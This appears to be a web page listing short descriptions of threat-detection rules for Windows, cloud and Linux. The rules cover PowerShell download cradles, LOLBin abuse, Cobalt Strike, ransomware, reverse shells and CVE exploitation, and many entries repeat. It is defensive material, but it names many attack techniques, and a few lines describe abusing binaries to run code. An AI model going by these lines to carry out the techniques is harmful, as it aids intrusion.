Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
Sponsored by
Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
Detects suspicious scheduled task creations from a parent stored in a temporary folder
Posssible Payload Obfuscation
Detects process start from rare or uncommon folders like temporary folder or folders that usually don’t contain executable files
Detects the usage of the unsafe bpftrace option
Uninstall an application with wmic
Detects the use of RunXCmd tool for command execution
Detects the use of NSudo tool for command execution
Detects the use of NirCmd tool for command execution as SYSTEM user
Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
Detects driver load events that got blocked by Windows code integrity checks
Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system
Rename as a legitim Sysinternals Suite tools to evade detection
Detects shell32.dll executing a DLL in a suspicious directory
Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Detects the creation of tasks from processes executed from suspicious locations
Detects use of executionpolicy option to set a unsecure policies
Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
Identifies when a new cloudshell is created inside of Azure portal.
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.
This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed.
Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32
Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.
Detects Commandlet names from ShellIntel exploitation scripts.
Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack
Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.
Detects process patterns found in Cobalt Strike beacon activity (see reference for more details)
Detects different hacktools used for relay attacks on Windows for privilege escalation
Detects suspicious mshta process patterns
Detects a regsvr.exe execution that doesn’t contain a DLL in the command line
Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7
Detects a suspicious script executions from temporary folder
Detects suspicious print spool service (spoolsv.exe) child processes.
Detects Commandlet names from PowerView of PowerSploit exploitation framework.
Detects different process creation events as described in Malwarebytes’s threat report on Lazarus group activity
Detects different process creation events as described in various threat reports on Lazarus group activity
Detects different loaders as described in various threat reports on Lazarus group activity
Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe
Detect ed user accept agreement execution in psexec commandline
Detects WMI executing rundll32
Detects triggering of AMSI by Windows Defender.
Detects specific process characteristics of Snatch ransomware word document droppers
Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
Detects blocking of process creations originating from PSExec and WMI commands
Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.
Detects space after filename
Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.
Detects all actions taken by Windows Defender malware detection engines
detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking
Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048
Detects suspicious network connection by Notepad
Detects specific process characteristics of Maze ransomware word document droppers
Detects creation of a local user via PowerShell
Detects parameters used by WMImplant
Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
Detects DLL’s Loaded Via Word Containing VBA Macros
Detects any GAC DLL being loaded by an Office Product
Detects any assembly DLL being loaded by an Office Product
Detects CLR DLL being loaded by an Office Product
Detects DSParse DLL being loaded by an Office Product
Detects Kerberos DLL being loaded by an Office Product
Detects command line parameters used by Koadic hack tool
Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.
Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
Detects events generated by Windows to indicate the exploitation of a known vulnerability (e.g. CVE-2020-0601)
The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
Detects DLL’s Loaded Via Word Containing VBA Macros Executing WMI Commands
Detects activity mentioned in Operation Wocao report
Detects command line parameters used by Bloodhound and Sharphound hack tools
Detects Silence empireDNSagent
Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
Detects manual service execution (start) via system utilities.
Launch 64-bit shellcode from a debugger script file using cdb.exe.
Execute VBscript code that is referenced within the *.bgi file.
Detects network connections and DNS queries initiated by Regsvr32.exe
Dnscat exfiltration tool execution
Detects non wmiprvse loading WMI modules
Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986
Detects remote PowerShell sessions
Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.
Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.
Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
Detects the use of various web request with commandline tools or Windows PowerShell command,methods (including aliases)
Detects a method to load DLL via LSASS process using an undocumented Registry key
Detects all Emotet like process executions that are not covered by the more generic rules
Detects the malicious use of a control panel item
This events that are generated when using the hacktool Ruler by Sensepost
Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.
Detects Commandlet names and arguments from the Nishang exploitation framework
Detects suspicious powershell command line parameters used in Empire
Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
Detects activity that could be related to Baby Shark malware
Detects new registry key created by Ursnif malware.
Detects keywords that could indicate the use of some PowerShell exploitation framework
Detects URL pattern used by iOS Implant
Detects suspicious file execution by wscript and cscript
Detects wscript/cscript executions of scripts located in user directories
Detects a suspicious child process of a Windows shell
Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
Detects WMI executing suspicious commands
Detects suspicious process related to rasdial.exe
Detects suspicious PowerShell invocation with a parameter substring
Detects suspicious powershell invocations from interpreters or unusual programs
Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
Detects the creation of scheduled tasks in user session
Detects multiple suspicious process in a limited timeframe
Detects a PsExec service start
Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
Detects a Powershell process that contains download commands in its command line string
Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio
Detects base64 encoded strings used in hidden malicious PowerShell command lines
Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
Detects Base64 encoded Shellcode
Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
Detects various indicators of Microsoft Connection Manager Profile Installer execution
Detects various indicators of Microsoft Connection Manager Profile Installer execution
Detects various indicators of Microsoft Connection Manager Profile Installer execution
Detects PowerShell remote thread creation in Rundll32.exe
Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
Detects the use of smbexec.py tool by detecting a specific service installation
Detects Elise backdoor acitivty as used by APT32
Detects relevant commands often related to malware or hacking activity
Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.
Detects a ZxShell start by the called and well-known function name
Detects PsExec service installation and execution events (service and Sysmon)
Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
Detects suspicious shell commands used in various exploit codes (see references)
Detects executable downloads from suspicious remote systems
Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company’s ip range')
Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292. You will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.
Detects suspicious PowerShell invocation command parameters
Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN
Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.
Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.
Detects suspicious file execution by wscript and cscript
Detects WMI spawning PowerShell
An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that “No instance(s) Available” if the service queried is not running. A common error message is “Node - (provided IP or default) ERROR Description =The RPC server is unavailable” if the provided remote host is unreacheable
Detects the WMI Event Consumer service scrcons.exe creating a named pipe
Detects code execution via the Windows Update client (wuauclt)
Detects suspicious child process creations of VMware Tools process which may indicate persistence setup
Detects using SettingSyncHost.exe to run hijacked binary
Application Virtualization Utility is included with Microsoft Office. We are able to abuse “AppVLP” to execute shell commands. Normally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder or to mark a file as a system file.
Detects Ursnif C2 traffic.
A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.
Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
Detects a named pipe used by Turla group samples
Detects automated lateral movement by Turla group
Detects commands used by Turla group as reported by ESET in May 2020
Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
Detects specific process characteristics of Chinese TAIDOOR RAT malware load
Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents
Detects execution of PowerShell
Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network for a WMI DLL Hijack scenario.
Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
An adversary might use WMI to list Processes running on the compromised host or list installed Software hotfix and patches.
Detects the execution of CSharp interactive console by PowerShell
Detects the creation of scheduled tasks that involves a temporary folder and runs only once
Detects execution of powershell scripts via Runscripthelper.exe
Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
Detects new commands that add new printer port which point to suspicious file
Detects suspicious PowerShell invocation command parameters
Detects suspicious PowerShell download command
Detects the PowerShell command lines with special characters
Detects the PowerShell command lines with reversed strings
Detects a suspicious parent of csc.exe, which could by a sign of payload delivery
Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.
Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL
Detects renamed ftp.exe, ftp.exe script execution and child processes ran by ftp.exe
Commandline to lauch powershell with a base64 payload
Detects EnableUnsafeClientMailRules used for Script Execution from Outlook
Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
Detects suspicious encoded payloads in WMI Event Consumers
schtasks.exe create task from user AppData\Local\Temp
Detects suspicious .NET assembly executions. Could detect using Cobalt Strike’s command execute-assembly.
Detects Possible Squirrel Packages Manager as Lolbin
This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
Detects a possible remote connections to Silenttrinity c2
Detects a suspicious script executions in temporary folders or folders accessible by environment variables
Detects a suspicious child process of Script Event Consumer (scrcons.exe).
Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Detects Ryuk Ransomware command lines
Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
Detects PowerShell script execution via input stream redirect
Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
Detects renamed powershell
Detects renamed jusched.exe used by cobalt group
Detects the presence of a registry key created during Azorult execution
Detects actions caused by the RedMimicry Winnti playbook
Detects QBot like process executions
Detects a ProcessHacker tool that elevated privileges to a very high level
Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.
Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
Detects powershell script installed as a Service
Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system
Detects the use of PSAttack PowerShell hack tool
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system
Detects suspicious encoded character syntax often used for defense evasion
Detects PowerShell calling a credential prompt
Detects PowerShell called from an executable by the version mismatch method
Detects that a powershell code is written to the registry as a service.
Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675
Detects processes creating temp files related to PCRE.NET package
Detects processes loading modules related to PCRE.NET package
A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
Detects a suspicious child process of a mshta.exe process
Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio
Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL.
Adversaries can abuse winget to download payloads remotely and execute them without touching disk. Winget will be included by default in Windows 10 and is already available in Windows 10 insider programs. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe’s, msi, msix files later.
Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of “-Embedding” as a child of svchost.exe
Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE
Detects keywords from well-known PowerShell exploitation frameworks
Detects Commandlet names from well-known PowerShell exploitation frameworks
Detects the creation of known powershell scripts for exploitation
Detects execution of AppleScript of the macOS scripting language AppleScript.
Detection of logins performed with WMI
Detects the process injection of a LittleCorporal generated Maldoc.
This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should to be correlated with 4624 and 4688 for further intrusion context.
Detects suspicious command sequence that JexBoss
Detects Obfuscated Powershell via use Rundll32 in Scripts
Detects Obfuscated Powershell via use Rundll32 in Scripts
Detects Obfuscated Powershell via use Rundll32 in Scripts
Detects Obfuscated Powershell via use MSHTA in Scripts
Detects Obfuscated Powershell via use MSHTA in Scripts
Detects Obfuscated Powershell via use MSHTA in Scripts
Detects Obfuscated Powershell via use Clip.exe in Scripts
Detects Obfuscated Powershell via use Clip.exe in Scripts
Detects Obfuscated Powershell via use Clip.exe in Scripts
Detects Obfuscated Powershell via Stdin in Scripts
Detects Obfuscated Powershell via Stdin in Scripts
Detects Obfuscated Powershell via Stdin in Scripts
Detects Obfuscated Powershell via VAR++ LAUNCHER
Detects Obfuscated Powershell via VAR++ LAUNCHER
Detects Obfuscated Powershell via VAR++ LAUNCHER
Detects Obfuscated use of Environment Variables to execute PowerShell
Detects Obfuscated use of Environment Variables to execute PowerShell
Detects Obfuscated use of Environment Variables to execute PowerShell
Detects Obfuscated use of stdin to execute PowerShell
Detects Obfuscated use of stdin to execute PowerShell
Detects Obfuscated use of stdin to execute PowerShell
Detects Obfuscated Powershell via RUNDLL LAUNCHER
Detects Obfuscated Powershell via RUNDLL LAUNCHER
Detects Obfuscated Powershell via RUNDLL LAUNCHER
Detects Obfuscated Powershell via COMPRESS OBFUSCATION
Detects Obfuscated Powershell via COMPRESS OBFUSCATION
Detects Obfuscated Powershell via COMPRESS OBFUSCATION
Detects Obfuscated use of Clip.exe to execute PowerShell
Detects Obfuscated use of Clip.exe to execute PowerShell
Detects Obfuscated use of Clip.exe to execute PowerShell
Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)
Detects events that appear when a user click on a link file with a powershell command in it
Detects tools and process executions as observed in a Greenbug campaign in May 2020
Adversaries can abuse of C:\Windows\System32\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target
A symbolic link is a type of file that contains a reference to another file. This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
Detects Archer malware invocation via rundll32
Detects using Diskshadow.exe to execute arbitrary code in text file
Detects file execution using the msdeploy.exe lolbin
Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
Detects adding and using Exchange PowerShell snap-ins to export mailbox data by HAFNIUM
Detects suspicious shell commands used in various Equation Group scripts and tools
Detects specific combinations of encoding methods in the PowerShell command lines
Detects download of certain file types from hosts in suspicious TLDs
dotnet.exe will execute any DLL and execute unsigned code
Detects Dllhost that communicates with public IP addresses
This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
Detects DarkSide Ransomware and helpers
Detects a suspicious process pattern found in CVE-2021-40444 exploitation
Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for | creation of non-standard files on disk by Exchange Server’s Unified Messaging service | which could indicate dropping web shells or other malicious content
Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server’s Unified Messaging service
Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
Adversaries may abuse Visual Basic (VB) for execution
Detects well-known credential dumping tools execution via service execution events
The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
Detect various execution methods of the CrackMapExec pentesting framework
Detects suspicious command lines used in Covenant luanchers
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. We can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml) In some SIEM you can catch those events also in HKLM\System\ControlSet001\Services or HKLM\System\ControlSet002\Services, however, this rule is based on a regular sysmon’s events.
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
Detects a typical pattern of a CobaltStrike BOF which inject into other processes
Detects CLR DLL being loaded by an scripting applications
Detects remote thread creation from CACTUSTORCH as described in references.
Detects base64 encoded .NET reflective loading of Assembly
Detects base64 encoded listing Win32_Shadowcopy
The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create “shortcuts” to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
Detects a highly relevant Antivirus alert that reports an exploitation framework
Detecting Code injection with PowerShell in another process
Detecting use WinAPI Functions in PowerShell